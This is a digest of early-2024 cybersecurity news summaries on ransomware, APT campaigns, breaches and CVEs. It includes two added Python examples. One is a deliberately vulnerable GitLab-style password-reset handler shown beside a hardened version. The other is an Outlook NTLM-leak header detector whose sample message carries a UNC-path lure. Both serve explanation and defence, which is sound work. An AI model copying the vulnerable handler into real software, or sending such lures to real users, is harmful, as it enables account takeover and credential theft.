A joint advisory from cybersecurity and intelligence agencies highlights the MooBot threat targeting users of Ubiquiti EdgeRouters. This botnet, orchestrated by Russia's APT28, has been operational since at least 2022 and has been employed in various cyber operations globally. APT28, known for its affiliation with Russia's Main Directorate of the General Staff, has been active since 2007 and is notorious for its sophisticated cyber campaigns.

Black Basta, Bl00dy Ransomware Gangs Join ScreenConnect Attacks

The Black Basta and Bl00dy ransomware groups have recently been identified as participants in a wave of attacks targeting vulnerable ScreenConnect servers. These attacks exploit a critical authentication bypass vulnerability (CVE-2024-1709), which enables threat actors to create administrative accounts on internet-exposed servers.

China Launches New Cyber-Defense Plan for Industrial Networks

China's Ministry of Industry and Information Technology (MIIT) has unveiled a comprehensive strategy aimed at bolstering data security within the nation's industrial sector. This initiative, slated for completion by the end of 2026, is designed to mitigate major risks posed by cyber threats to over 45,000 companies operating in various industrial verticals.

Change Healthcare Cyber-Attack Leads to Prescription Delays

Health tech firm Change Healthcare was hit with a cyberattack on February 21, 2024, leading to a disruption of a number of its systems and services. According to Change Healthcare, numerous applications across areas such as pharmacy, medical records, dental, payment services, and patient engagement are still experiencing connectivity issues. In particular, pharmacies have reported being unable to process patient prescriptions, preventing individuals from getting their medications on time.

New ScreenConnect RCE Flaw Exploited in Ransomware Attacks

Last week enterprise IT giant ConnectWise released patches to address a maximum-severity flaw impacting its remote access software, ScreenConnect. Tracked as CVE-2024-1709, the bug pertains to an authentication bypass that could potentially enable attackers to gain access to confidential information or critical systems.

X Protests Forced Suspension of Accounts on Orders of India's Government

and government regulation in the digital age, particularly in countries like India where social and political tensions often spill over into online platforms. The global government affairs team at X, previously known as Twitter, has taken action to suspend certain accounts and posts within India as per directives received from the country's government.

Unmasking I-Soon | The Leak That Revealed China's Cyber Operations

The leak from I-Soon, a company contracting for various Chinese government agencies including the Ministry of Public Security, Ministry of State Security, and People's Liberation Army, occurred over the weekend of February 16th. The source of the leak and motives behind it remain unknown, but it offers unprecedented insight into the operations of a state-affiliated hacking contractor.

LockBit Ransomware Secretly Building Next-Gen Encryptor Before Takedown

Researchers at Trend Micro have uncovered details on a new LockBit sample that the actors were secretly building prior to law enforcement's takedown of the group's infrastructure earlier this week. The new sample, dubbed LockBit-NG-Dev, is written in the .NET programming language and appears to be compiled with CoreRT, whereas previous LockBit samples were written in C++.

'Lucifer' Botnet Turns Up the Heat on Apache Hadoop Servers

A new iteration of the Lucifer botnet has emerged, specifically aimed at organizations utilizing Apache Hadoop and Apache Druid big data technologies. The variant combines the insidious traits of cryptojacking and distributed denial of service capabilities, posing a significant threat to vulnerable systems.

LockBit Leaks Expose Nearly 200 Affiliates and Bespoke Data-Stealing Malware

This article provides an update on recent revelations regarding the LockBit ransomware group. Law enforcement authorities have disclosed that nearly 200 "affiliates" have registered with the group over the past two years. Affiliates are individuals who participate in the gang's ransomware-as-a-service model, utilizing LockBit's tools in exchange for a share of the profits obtained from victims.

Warning of North Korean Cyber Threats Targeting the Defense Sector

The Bundesamt für Verfassungsschutz (BfV) of Germany and the National Intelligence Service (NIS) of the Republic of Korea (ROK) have issued a joint Cyber Security Advisory (CSA) to alert about cyber campaigns likely conducted by North Korean actors targeting the defense sector. North Korea's focus on military strength drives them to steal advanced defense technologies globally, using cyber espionage as a cost-effective method.

Cactus Ransomware Gang Claims The Theft Of 1.5TB Of Data From Energy Management And Industrial Automation

The Cactus ransomware group, which claimed responsibility for an attack on Schneider Electric, says it has stolen 1.5TB of data from the energy management and industrial automation company. According to reports, the company's Sustainability Business division was targeted on January 17th. The impact was felt as the company's cloud services faced outages; however, other divisions of the company were not affected.

US Gov Dismantled The Moobot Botnet Controlled by Russia-Linked APT28

In January 2024, a court-authorized operation took down the Moobot botnet, a network of hundreds of small office/home office (SOHO) routers under the control of the Russia-linked group APT28. The court order enabled law enforcement to use the Moobot malware itself to copy and delete stolen and malicious data and files from the compromised routers.

Over 13,000 Ivanti gateways vulnerable to actively exploited bugs

This year, Ivanti has disclosed several vulnerabilities impacting its Connect Secure, Policy Secure, and ZTA gateways. Tracked as CVE-2024-22024, CVE-2023-46805, CVE-2024-21887, CVE-2024-21893, and CVE-2024-21888, these flaws range from high to critical in severity and cover authentication bypass, server-side request forgery, arbitrary command execution, and command injection.

Russian Turla Hackers Target Polish NGOs with New TinyTurla-NG Backdoor

Cisco Talos disclosed details of a three-month-long campaign where Russia-linked threat actor Turla has been targeting Polish non-governmental organizations with a new backdoor dubbed TinyTurla-NG. This campaign has been ongoing since December 18, 2023, with researchers suspecting that the activity may have actually commenced in November 2023 based on malware compilation dates.

U.S. Internet Leaked Years of Internal, Customer Emails

Minnesota-based Internet service provider U.S. Internet Corp has suffered a significant data leak. Specifically, a business unit called Securence, which specializes in providing filtered, secure email services to businesses, educational institutions and government agencies worldwide, was accidentally publishing more than a decade's worth of its own internal emails, and those of thousands of clients, in plain text on the Internet where anyone could view them.

MFA and Software Supply Chain Security: It's No Magic Bullet

A recent article from ReversingLabs examines the importance of multifactor authentication (MFA) in securing software development environments, particularly in light of high-profile attacks such as SolarWinds, Codecov, and Kaseya. The report highlights how attackers target developer accounts to manipulate code, access secrets, and wreak havoc on organizations and their customers, and why MFA on those accounts is necessary but not sufficient.

Warzone RAT Infrastructure Seized

On February 9, 2024, the Justice Department announced the seizure of internet domains selling the Warzone RAT malware, a sophisticated Remote Access Trojan. Domains including www[.]warzone[.]ws were seized, with two suspects arrested in Malta and Nigeria for selling the malware. The operation, led by the FBI and supported by Europol and J-CAT, aimed to disrupt cybercriminals using the malware.

FCC Makes AI-Generated Voices in Robocalls Illegal

The Federal Communications Commission (FCC) has made AI-generated voices in robocalls illegal under the Telephone Consumer Protection Act (TCPA), with a Declaratory Ruling that took effect immediately. This ruling aims to combat the rising trend of robocall scams that use AI-generated voices to deceive consumers, imitate celebrities, and spread misinformation.

Notorious Bumblebee Malware Re-emerges with New Attack Methods

The Bumblebee malware, known for its role as an initial access broker facilitating the download and execution of additional payloads like Cobalt Strike and Meterpreter, has made a comeback with fresh tactics after a period of dormancy. Proofpoint researchers observed a significant shift in the attack chain, diverging from previous Bumblebee patterns.

Bank of America Customer Data Stolen in Data Breach

Bank of America is warning its customers of a data breach exposing their personal information after one of its third-party service providers, Infosys McCamish Systems (IMS), fell victim to a cyber attack in November of last year. LockBit claimed responsibility for the attack, listing IMS on its data leak site on November 4.

Rhysida Ransomware Cracked, Free Decryption Tool Released

A group of researchers from Kookmin University and the Korea Internet and Security Agency (KISA) uncovered an implementation vulnerability enabling them to reconstruct encryption keys and decrypt data locked by Rhysida ransomware. “Rhysida ransomware employed a secure random number generator to generate the encryption key and subsequently encrypt the data.

Exploitation of Another Ivanti VPN Vulnerability Observed

Last week, Ivanti disclosed a new vulnerability impacting its Connect Secure, Policy Secure, and ZTA gateway appliances. Tracked as CVE-2024-22024, the flaw impacts the SAML component of these appliances and can be exploited by actors to gain access to restricted resources without authentication. At the time of the disclosure, Ivanti noted that it had no evidence to suggest that the flaw was being actively exploited.

Raspberry Robin Keeps Riding the Wave of Endless Zero-days

Researchers from Check Point have released a new report on the evolution of the Raspberry Robin malware. The latest strains are stealthier and carry several 1-day exploits that are deployed against specific vulnerable systems. A 1-day exploit targets a vulnerability that, unlike a zero-day, has already been publicly disclosed and usually has a vendor patch available. Threat actors weaponize these vulnerabilities soon after disclosure, in the window before victims have installed the patch.

Ransomware Payments Reached Record $1.1 billion in 2023

In 2023, ransomware payments soared to a record $1.1 billion, reversing the declining trend in 2022. According to researchers from Chainalysis, this trend is likely attributed to the escalating attacks against major institutions and critical infrastructure and Clop's massive MOVEit campaign, which compromised dozens of organizations across the globe.

Lessons from the Mercedes-Benz Source Code Exposure

Mercedes-Benz faced a significant security breach when a GitHub access token was mistakenly left in a public repository, resulting in the exposure of sensitive internal data. The exposure, discovered by RedHunt Labs security researchers, included critical internal information, intellectual property, and sensitive credentials.

Verizon Insider Data Breach Hits over 63,000 Employees

Verizon Communications issued an advisory this week that an insider data breach has impacted almost half of its workforce, exposing sensitive employee personally identifiable information (PII). A data breach notification shared with the Office of the Maine Attorney General reveals that a Verizon employee gained unauthorized access to a file containing sensitive employee information on September 21, 2023.

Hackers Steal Data of 2 Million in SQL Injection, XSS Attacks

A group known as 'Resume Looters' has conducted SQL injection attacks on 65 legitimate job listing and retail websites, compromising the personal data of over two million job seekers, mainly in the APAC region. The group targeted sites in Australia, Taiwan, China, Thailand, India, and Vietnam to steal names, email addresses, phone numbers, employment history, education and other information.

Beware: Fake Facebook Job Ads Spreading 'Ov3r_Stealer' to Steal Crypto and Credentials

A new campaign has been uncovered by Trustwave SpiderLabs where actors are using Facebook job advertisements to trick unsuspecting end users into installing a novel Windows-based stealer malware codenamed Ov3r_Stealer. For its part, Ov3r_Stealer is capable of siphoning IP address-based location, hardware info, passwords, cookies, credit card information, auto-fills, browser extensions, crypto wallets, Microsoft Office documents, and a list of antivirus products installed on the compromised host.

US to Roll Out Visa Restrictions on People Who Misuse Spyware to Target Journalists, Activists

Yesterday, the Biden administration announced it would be rolling out a new policy to impose visa restrictions on foreign individuals involved in the misuse of commercial spyware. This includes those who have used spyware to target individuals such as journalists, activists, perceived dissidents, members of marginalized communities, or the family members of those who are targeted.

US Condemns Iran, Issues Sanctions for Cyber-Attacks on Critical Infrastructure

The US issued new sanctions against Iran after "destabilizing and potentially escalatory" cyber attacks against US critical infrastructure. The remarks were made in a statement announcing sanctions against six Iranians for last year's cyber attacks on Unitronics programmable logic controllers, devices made by an Israeli manufacturer and used in the water sector and other critical infrastructure organizations. Several organizations in the water sector were impacted by a group of hacktivists called the CyberAv3ngers.

Dirtymoe (Purplefox) Affected More Than 2000 Computers in Ukraine

The Government Computer Emergency Response Team of Ukraine (CERT-UA) took action under the law to assist a state-owned enterprise facing significant damage from the DIRTYMOE (PURPLEFOX) malicious program, which affected over 2,000 computers in the Ukrainian Internet segment. Analysis of malware samples and reference to reports from Avast and Trend Micro aided in understanding the threat's intricacies.

New Windows Event Log zero-Day Flaw Gets Unofficial Patches

Temporary patches have been released to address a new Windows zero-day flaw dubbed EventLogCrasher that lets attackers remotely crash the Event Log service on devices within the same Windows domain. According to security researcher Florian, who discovered and reported the flaw, Microsoft tagged it as "not meeting servicing requirements" and said it is a duplicate of a bug disclosed in 2022 (no further details were provided).

US Shorts China's Volt Typhoon Crew Targeting America's Criticals

According to Reuters, the US Justice Department and FBI have reportedly taken action against Chinese state-sponsored hackers attempting to infiltrate American critical infrastructure. Over several months, law enforcement conducted operations authorized by a court order, to disable parts of the Chinese hacking campaign. This campaign, known as Volt Typhoon, was revealed in May 2023 after it was found that the hackers accessed US critical infrastructure networks as far back as 2021.

ICS Ransomware Danger Rages Despite Fewer Attacks

In a recent report provided by Dragos, despite the takedown of prominent ransomware groups, the remaining threat actors have evolved their tactics and maintained the exploitation of zero-day vulnerabilities. This has allowed them to inflict more damage on industrial control systems (ICS) with fewer attacks, as highlighted in Dragos' latest industrial ransomware analysis for the last quarter of 2023.

Microsoft Teams Phishing Pushes DarkGate Malware Via Group Chats

AT&T's cybersecurity research team has uncovered a new wave of phishing attacks that abuse Microsoft Teams group chat requests to distribute malicious attachments designed to infect targeted systems with DarkGate malware. In total, attackers have used what seems to be a compromised Teams user (or domain) to send over 1,000 malicious group chat invites to unsuspecting users.

New ZLoader Malware Variant Surfaces with 64-bit Windows Compatibility

Researchers at Zscaler have uncovered a new campaign that is delivering a new variant of the ZLoader malware to targeted systems. This variant is said to have been in development since September 2023 and contains significant changes to the loader module: it adds RC4 encryption, updates the domain generation algorithm, and is compiled for 64-bit Windows for the first time.

Energy Giant Schneider Electric Hit by Cactus Ransomware Attack

Energy management and automation giant Schneider Electric recently suffered a ransomware attack that targeted its Sustainability Business division, which advises enterprise organizations worldwide on renewable energy solutions and helps them navigate complex climate regulatory requirements.

Rust Payloads Exploiting Ivanti Zero-Days Linked to Sophisticated Sliver Toolkit

Recent findings suggest that payloads discovered on compromised Ivanti Connect Secure appliances may originate from a single, highly skilled threat actor, according to incident response provider Synacktiv. A malware analysis by Synacktiv reveals that the 12 Rust payloads found in relation to two Ivanti Connect Secure VPN zero-day vulnerabilities share nearly identical code, suggesting a common origin.

Ukraine: Hack Wiped 2 Petabytes of Data from Russian Research Center

Ukraine's Ministry of Defense says that pro-Ukrainian hacktivists have breached the Russian Center for Space Hydrometeorology (Planeta), and have wiped 2 petabytes of data from their systems. Planeta is a state funded research center that uses space satellite data, ground radars, and ground stations to provide accurate predictions about weather, climate, natural disasters, extreme phenomena, and volcanic monitoring.

A Cyber Insurer's Perspective on How to Avoid Ransomware

In 2023, the cybersecurity landscape saw a resurgence of ransomware attacks, with a 27% increase in frequency during the first half of the year compared to the second half of 2022. May witnessed the highest number of ransomware claims in a single month in Coalition history. Ransomware also became the leading contributor to the overall increase in claims frequency, comprising 19% of all reported claims.

Top 3 Data Breaches of 2023, and What Lies Ahead in 2024

In summary, the report says that the surge in cloud migration, coupled with AI and machine learning, accelerated data use and storage in 2023. This led to significant breaches, with notable incidents including the MOVEit extortion campaign impacting 62 million individuals globally, the ICMR breach exposing 81.5 million Indian citizens' data, and 23andMe's unauthorized access compromising 9 million user accounts.

FBI: Tech support scams now use couriers to collect victims' money

The FBI is warning that couriers are now being used by cyber criminals to collect money and valuables from victims of tech support and government impersonation scams. Many of the victims are senior citizens who are being targeted by scammers posing as employees of technology companies, financial institutions, or the U.S. government. These victims are told by the actors that their financial accounts have been compromised or are under threat.

Malicious PyPI Packages Slip WhiteSnake InfoStealer Malware onto Windows Machines

Researchers at Fortinet uncovered a Python Package Index (PyPI) malware author who goes by the ID "WS" uploading malicious packages to PyPI designed to infect developers with WhiteSnake Stealer. Several packages were identified, including nigpal, figflix, telerer, seGMM, fbdebug, sGMM, myGens, NewGends, and TestLibs111, which researchers estimate to have impacted over 2,000 victims.

ChatGPT Cybercrime Surge Revealed in 3000 Dark Web Posts

Kaspersky researchers are warning of a notable surge in dark web discussions related to the use of ChatGPT and other Large Language Models (LLMs) to bolster cyber attacks. Nearly 3000 dark web posts were identified, focusing on a spectrum of cyber-threats, from creating malicious chatbot versions to exploring alternative projects like XXXGPT and FraudGPT. While the chatter apparently peaked in March of last year, there have been continued ongoing discussions about exploiting AI technologies for illegal activities.

Browser Phishing Threats Grew 198% Last Year

Based on Menlo Security's browser security report for 2023, browser-based phishing attacks increased a whopping 198% in the second half of 2023. In general phishing attacks seem to have evolved in the last couple of years. According to researchers, they identified 11,000 zero-hour phishing attacks in a span of 30 days.

Thousands of GitLab Instances Unpatched Against Critical Password Reset Bug

Two weeks ago, GitLab released patches to address a critical password reset vulnerability. Tracked as CVE-2023-7028, the bug can be exploited by actors to send password reset messages to unverified email addresses under their control. If the target organization does not have two-factor authentication, an actor in this case could initiate a potential account takeover by resetting the password. Patches for the bug
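The bug class behind this flaw is a password-reset endpoint that trusts a caller-supplied list of recipient addresses. The following is an added illustration, not GitLab's code: a reset handler that accepts an array of e-mail addresses (the `user[email][]` pattern), resolves the account from any of them and then mails the token to all of them, beside a hardened version that accepts exactly one address and only ever delivers to addresses already verified on the account. The users and addresses are constructed sample data.

```python
"""Model of the password-reset bug class: an endpoint that accepts an array of e-mail
addresses and mails the token to all of them, beside a hardened version.
Added illustration, not GitLab's code; users and addresses are constructed."""
import secrets
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple


@dataclass
class User:
    username: str
    verified_emails: Set[str]          # addresses the account owner has confirmed
    reset_token: Optional[str] = None


# Constructed sample directory (hypothetical users, not real data).
USERS: Dict[str, User] = {
    "alice": User("alice", {"alice@example.org", "alice@example.net"}),
}


def find_user_by_email(email: str) -> Optional[User]:
    """Look an account up by one of its verified addresses."""
    for user in USERS.values():
        if email.lower() in user.verified_emails:
            return user
    return None


def vulnerable_request_reset(emails: List[str]) -> List[Tuple[str, str]]:
    """Vulnerable pattern: the form field arrives as user[email][] (an array).
    The account is resolved from *any* listed address, but the reset link is then
    sent to *every* listed address, including ones the attacker controls."""
    user = None
    for email in emails:
        user = find_user_by_email(email)
        if user is not None:
            break
    if user is None:
        return []
    user.reset_token = secrets.token_urlsafe(32)
    # Every recipient gets a working token, so the attacker-controlled address
    # can complete the reset unless the victim has 2FA enabled.
    return [(email, user.reset_token) for email in emails]


def hardened_request_reset(emails: List[str]) -> List[Tuple[str, str]]:
    """Hardened pattern: exactly one address is accepted, and the token is delivered
    only to addresses already verified on the resolved account, never to caller input."""
    if len(emails) != 1:
        raise ValueError("expected exactly one e-mail address")
    user = find_user_by_email(emails[0])
    if user is None:
        return []  # indistinguishable from success, to avoid account enumeration
    user.reset_token = secrets.token_urlsafe(32)
    return [(email, user.reset_token) for email in sorted(user.verified_emails)]
```

The second function also shows why 2FA was the saving grace here: the hardened handler makes the attacker's address unreachable, but on the vulnerable one only a second factor stands between a delivered token and a takeover.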

Malicious Traffic Distribution System Spotted by Researchers

Researchers have uncovered the growing professionalization of the cybercrime ecosystem, highlighting an online redirection service, VexTrio, as a major traffic broker for various threat groups. VexTrio operates malicious traffic distribution systems that profile victims on factors like device type and location and redirect them to malicious sites according to each client's requirements.

The Number of Patient Records Exposed in Data Breaches Doubled in 2023

According to a new report from cybersecurity firm Fortified Health Security, 116 million records were compromised across 655 breaches. In 2023, the number of patient records exposed in data breaches doubled in comparison to 2022, despite the number of breaches declining slightly. This is likely due to an increase in the number of large data breaches, where 16 breaches exposed more than two million patient records each.

Kasseika Ransomware Uses Antivirus Driver to Kill Other Antiviruses

A new ransomware strain, dubbed Kasseika, that was uncovered in December 2023 has joined the list of ransomware gangs employing Bring Your Own Vulnerable Driver (BYOVD) tactics to disable antivirus software on targeted systems. BYOVD attacks work by dropping (or abusing an already present) legitimately signed but vulnerable kernel driver in the victim environment and using it to carry out privileged operations such as terminating security processes.

Google Pixel Phones Unusable After January 2024 System Update

According to recent reports Google Pixel smartphone owners are experiencing issues after installing the January 2024 Google Play system update. Problems include being unable to access internal storage, open the camera, take screenshots, or open apps. The issue affects various Pixel models, indicating it's not specific to a particular hardware architecture.

Exploit Code Released For Critical Fortra GoAnywhere Bug

Exploit code has been released for a critical vulnerability in Fortra GoAnywhere MFT, a managed file transfer solution. Researchers from Horizon3 released exploit details for CVE-2024-0204, a critical authentication bypass vulnerability which was patched by Fortra on December 4, 2023, but only publicly revealed by the vendor on Monday.

Mandiant Publishes Guide: Defend Against the Latest Active Directory Certificate Services Threats

Active Directory Certificate Services (AD CS) is a server role that enables organizations to leverage public key infrastructure (PKI) as part of their on-premises services to issue and use digital certificates for authenticating identities and endpoints in Active Directory environments. As highlighted by SpecterOps in 2021, AD CS has become a prime target and leverage point in the overall attack chain to achieve post-compromise objectives.

Black Basta Ransomware Group Claims Hack of UK Water Utility Southern Water

The Black Basta ransomware group has added the UK's Southern Water as a victim on its Tor-based data leak site and has threatened to publish stolen data if ransom demands are not met by February 29, 2024. "Southern Water is a private utility company responsible for collecting and treating wastewater in Hampshire, the Isle of Wight, West Sussex, East Sussex and Kent, and for providing public water supply to approximately half of this area" (Security Affairs, 2024). The company serves a large part of south-east England and employs over 6,000 people.

Attackers Can Steal NTLM Password Hashes via Calendar Invites

A patched vulnerability (CVE-2023-35636) in Microsoft Outlook, allowing theft of NTLM v2 hashes, can be exploited through specially crafted email headers. Security researcher Dolev Taler and Varonis Threat Labs disclosed two additional unpatched vulnerabilities of “moderate” severity for obtaining NTLM v2 hashes.
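The leak described above is triggered by message headers rather than by an attachment, so it can be caught at the mail gateway. The following detection is an added example, not Varonis' or Microsoft's code. It assumes the header names from the Varonis write-up: a message carrying `Content-Class: Sharing` makes Outlook fetch the sharing configuration from `x-sharing-config-url`, and when that value is a UNC path or `file://` URL the client authenticates to an attacker-chosen server and leaks the NTLMv2 hash. The two messages are constructed samples using documentation addresses.

```python
"""Header-based detection for the Outlook calendar-sharing NTLM leak.
Added example, not Varonis' or Microsoft's code. Header names are assumed from the
Varonis write-up; sample messages are constructed."""
import re
from email import message_from_string
from typing import List

UNC_PATH = re.compile(r"^\\\\[^\\]+\\")                  # \\host\share\...
REMOTE_FILE_SCHEME = re.compile(r"^(file|smb)://", re.I)  # file://host/share/...


def is_hash_leak_target(url: str) -> bool:
    """True when fetching the URL makes the client authenticate over SMB/WebDAV."""
    url = url.strip()
    return bool(UNC_PATH.match(url) or REMOTE_FILE_SCHEME.match(url))


def scan_headers(raw_message: str) -> List[str]:
    """Return findings for one RFC 5322 message; only the headers are inspected."""
    msg = message_from_string(raw_message)
    findings: List[str] = []
    content_class = (msg.get("Content-Class") or "").strip().lower()
    config_url = msg.get("x-sharing-config-url")
    if content_class == "sharing" and config_url and is_hash_leak_target(config_url):
        findings.append(
            f"sharing invite fetches its config from an off-host path: {config_url.strip()}"
        )
    return findings


# Constructed sample messages (hypothetical addresses; 203.0.113.0/24 is documentation space).
MALICIOUS_EML = r"""From: calendar@example.invalid
To: victim@example.org
Subject: Shared calendar
Content-Class: Sharing
x-sharing-config-url: \\203.0.113.7\share\invite.ics

Please accept the shared calendar.
"""

BENIGN_EML = r"""From: colleague@example.org
To: victim@example.org
Subject: Shared calendar
Content-Class: Sharing
x-sharing-config-url: https://calendar.example.org/share/abc.ics

Please accept the shared calendar.
"""
```

Blocking outbound SMB (TCP 445) at the perimeter removes the leak path regardless of header inspection; the check above is for catching attempts and for mail that reaches clients on networks where that egress block is not in place.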

loanDepot Says Ransomware Gang Stole Data of 16.6 Million People

Mortgage lender loanDepot has confirmed that approximately 16.6 million individuals had their personal information stolen in a ransomware attack disclosed earlier this month. The attack, which occurred on January 6, led to the shutdown of some systems, affecting recurring automatic payments and causing delays in payment history updates. The company, acknowledging the breach as a ransomware incident, mentioned that files on compromised devices were encrypted by malicious actors.

Senior Microsoft Employee's Email Account Breached in Cyber Attack

Microsoft revealed this week that it was targeted by the Russian state-sponsored hacking group Midnight Blizzard. The group used a password spray attack to compromise a legacy non-production test tenant account and, from that foothold, gained access to the email accounts of members of Microsoft's senior leadership team and of employees in its cybersecurity and legal departments.

Thieves Steal 35.5M Customers' Data from Vans Sneakers Maker

VF Corporation, the parent company of brands like Vans and North Face, disclosed that 35.5 million customers were impacted when criminals breached their systems in December. The announcement, made in an SEC filing, didn't specify the type of information accessed. However, VF Corp assured that social security numbers, bank details, and payment card information were not compromised, as they are not stored in its IT systems. The company also stated that there is no evidence of consumer passwords being accessed, though the investigation is ongoing.

Over 178K SonicWall Firewalls Vulnerable to DoS, Potential RCE Attacks

Security researchers at Bishop Fox have identified over 178,000 SonicWall next-generation firewalls with their management interface exposed online that are vulnerable to two stack-based buffer overflow flaws. Tracked as CVE-2022-22274 and CVE-2023-0656, the two vulnerabilities are essentially the same bug and can be exploited by unauthenticated actors for denial of service and potentially remote code execution.

Hacker Spins Up 1 Million Virtual Servers to Illegally Mine Crypto

Last week, Europol announced the arrest of a 29-year-old Ukrainian national for using hacked accounts to create 1 million servers in a worldwide cryptojacking scheme to illegally mine cryptocurrency. The individual is suspected to have been active since 2021 and is known for hijacking cloud computing resources for crypto-mining. Starting in 2021, the hacker compromised one of the world's largest e-commerce companies, using automated tools to brute force the passwords of 1,500 accounts belonging to a subsidiary of that company.

Protecting MSPs and Mid-Market Companies from ‘FalseFont' Backdoor Attacks

A new backdoor named "FalseFont" has been discovered, attributed to the Iranian hacking group Peach Sandstorm. This backdoor poses a significant threat to Managed Service Providers (MSPs) and mid-market companies, particularly those with limited cybersecurity measures. Peach Sandstorm is a global threat actor known for sophisticated cyberattacks since 2013, targeting sectors like defense, aerospace, and energy.

Finland Warns of Akira Ransomware Wiping NAS and Tape Backup Devices

The Finnish National Cybersecurity Center recently sent out an advisory warning of an uptick in Akira ransomware activity. In the latest set of attacks, Akira actors are going after network-attached storage devices as well as tape devices and wiping the backups stored on them, making it difficult for victims to recover files. As a result, the agency recommends that organizations switch to offline backups and distribute backups across various locations to prevent unauthorized access.

Atomic Stealer Gets an Upgrade - Targeting Mac Users with Encrypted Payload

Researchers at Malwarebytes have uncovered an updated version of Atomic Stealer, an information stealer designed to target macOS systems. The update was made in mid-December 2023, when the authors behind the malware introduced a new payload encryption routine designed to hide certain strings that were previously used for detection and for identifying the C2 server.

Cisco Says Critical Unity Connection Bug Lets Attackers Get Root

Cisco patched a critical vulnerability tracked as CVE-2024-20272 in their Unity Connection product. The flaw could allow an unauthenticated attacker to remotely gain root privileges on unpatched devices. Unity Connection is a fully virtualized messaging and voicemail solution for email inboxes, web browsers, Cisco Jabber, Cisco Unified IP Phone, smartphones, or tablets with high availability and redundancy support.

Alert: Water Curupira Hackers Actively Distributing PikaBot Loader Malware

Water Curupira, a threat actor, distributed the PikaBot loader malware in spam campaigns throughout 2023. Trend Micro reported that PikaBot's phishing attacks used a loader and a core module to gain remote access and execute commands via a connection to the actor's server. The activity ran from the first quarter of 2023 through June and resembled earlier campaigns by the cybercrime groups TA571 and TA577 that delivered Qakbot.

'Swatting' Becomes Latest Extortion Tactic in Ransomware Attacks

Cybercriminals are now using "swatting" to pressure hospitals into paying ransom demands by targeting their patients. Swatting involves making false police reports that prompt armed responses to victims' homes. In the Fred Hutchinson Cancer Center case, for example, cybercriminals stole medical records and threatened to swat patients if their ransom demands were not met.

Crooks Pose as Researchers to Retarget Ransomware Victims

Victims of Royal and Akira ransomware are being targeted by actors masquerading as cybersecurity researchers offering to delete the files stolen by the two ransomware gangs. According to Arctic Wolf Labs, which has tracked several such interactions, these actors contact victims claiming they will hack into the server infrastructure of the original ransomware groups to delete the exfiltrated data.

NoaBot: Latest Mirai-Based Botnet Targeting SSH Servers for Crypto Mining

Security researchers at Akamai have uncovered a new crypto-mining campaign that has been active since the beginning of 2023. These attacks include the use of a new Mirai-based botnet dubbed ‘NoaBot' which comes with various capabilities including a wormable self-spreader and an SSH key backdoor designed to download and execute additional binaries and spread itself to other systems.

Malware Takedowns Show Progress, But Fight Against Cybercrime Not Over

In its 2023 Adversary Infrastructure Report, published on January 9, 2024, Recorded Future analyzed the effect of three malware takedown operations that took place in 2023 or before. One was the March 2023 attempt to take down unlicensed versions of the commercial red-teaming product Cobalt Strike, a joint project between Microsoft, the Health Information Sharing and Analysis Center (Health-ISAC), and Fortra, the software company that owns Cobalt Strike. In the cases of Cobalt Strike and QakBot, law enforcement operations had a significant impact in the short term, and malicious activity linked with the two tools dropped drastically in the month following the operation.

Ukrainian “Blackjack” Hackers Take Out Russian ISP

A group linked to Ukraine's SBU has allegedly launched a destructive cyber-attack against a Moscow ISP in retaliation for Russia's takedown of Kyivstar last month. According to reports, the group, called "Blackjack", deleted 20 TB of data at M9 Telecom, leaving some residents of Moscow without Internet service.

.NET Hooking – Harmonizing Managed Territory

For malware researchers, analysts, and reverse engineers, Check Point says the ability to alter the functionality of certain parts of code is a crucial step. Hooking processes for code execution works well for unmanaged native code, but becomes more challenging when dealing with managed code. For altering the functionality of managed code, specifically applications that run on top of .NET, Check Point says the open-source library Harmony is the best option.

NoName on Rampage! Claims DDoS Attacks on Ukrainian Government Sites

The pro-Russian hacktivist group NoName057(16) recently posted a list of its latest DDoS attack victims. Many of these victims are Ukrainian entities, including Accordbank, Zaporizhzhya Titanium-Magnesium Plant, the State Tax Service, the Central Interregional Tax Administration, the Western Interregional Tax Administration, and the Main Directorate of the State Tax Service in Kyiv.

Stealthy AsyncRAT Malware Attacks Targets US Infrastructure For 11 Months

Security researchers have uncovered a new campaign that has been delivering AsyncRAT malware to select targets for the last 11 months using hundreds of unique loader samples and more than 100 domains. The campaign was initially discovered by a security researcher from Microsoft, Igal Lytzki, who spotted attacks last summer that were delivered over hijacked email threads.

Zeppelin ransomware source code sold for $500 on hacking forum

A threat actor who goes by the name 'RET' is claiming to have access to the source code as well as a builder for the Zeppelin ransomware. Both are being advertised for sale on an underground forum for $500, with screenshots offered as proof of the package's legitimacy. In the post, the actor claims to have simply cracked a builder version of the ransomware strain and acquired the package without a license.

Russian Hackers Penetrated Ukraine Telecoms Giant for Months

Russian hackers were inside Ukrainian telecoms giant Kyivstar's system from at least May last year in a cyberattack that should serve as a "big warning" to the West, Ukraine's cyber spy chief told Reuters. The attack, one of the most dramatic since Russia's full-scale invasion nearly two years ago, knocked out services provided by Ukraine's biggest telecoms operator for some 24 million users for days from Dec. 12.

Ivanti Warns Critical EPM Bug Lets Hackers Hijack Enrolled Devices

Ivanti recently fixed a critical remote code execution (RCE) vulnerability in its Endpoint Management software (EPM). The flaw allows unauthenticated attackers to hijack enrolled devices or the core server. The service helps manage client devices running a wide range of platforms, from Windows and macOS to Chrome OS and other IoT operating systems.

Hacker Hijacks Orange Spain RIPE Account to Cause BGP Havoc

Orange Spain suffered an internet outage today after a hacker breached the company's RIPE account to misconfigure BGP routing and an RPKI configuration. The routing of traffic on the internet is handled by Border Gateway Protocol (BGP), which allows organizations to associate their IP addresses with autonomous system (AS) numbers and advertise them to other routers they are connected to, known as their peers.

Palestinian Hackers Hit 100 Israeli Organizations in Destructive Attacks

Cyber Toufan, a sophisticated threat actor claiming to be formed of Palestinian state cyber warriors, has managed to target over 100 entities in Israel in the last couple of months. This series of attacks has been fueled by geopolitical tensions between Israel and Hamas, a pro-Palestinian militant group. The latest intrusions carried out by Cyber Toufan have led to the exfiltration of large amounts of data, which is being released to the public web.

CISA Warns of Actively Exploited Bugs in Chrome and Excel Parsing Library

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two vulnerabilities to its Known Exploited Vulnerabilities catalog. The first is CVE-2023-7101, affecting the open-source Perl library Spreadsheet::ParseExcel, with a remote code execution flaw. This vulnerability was exploited by Chinese hackers in late December, targeting Barracuda ESG appliances. Mitigations were applied, and an update was released on December 29, 2023.

Nearly 11 Million SSH Servers Vulnerable to New Terrapin Attacks

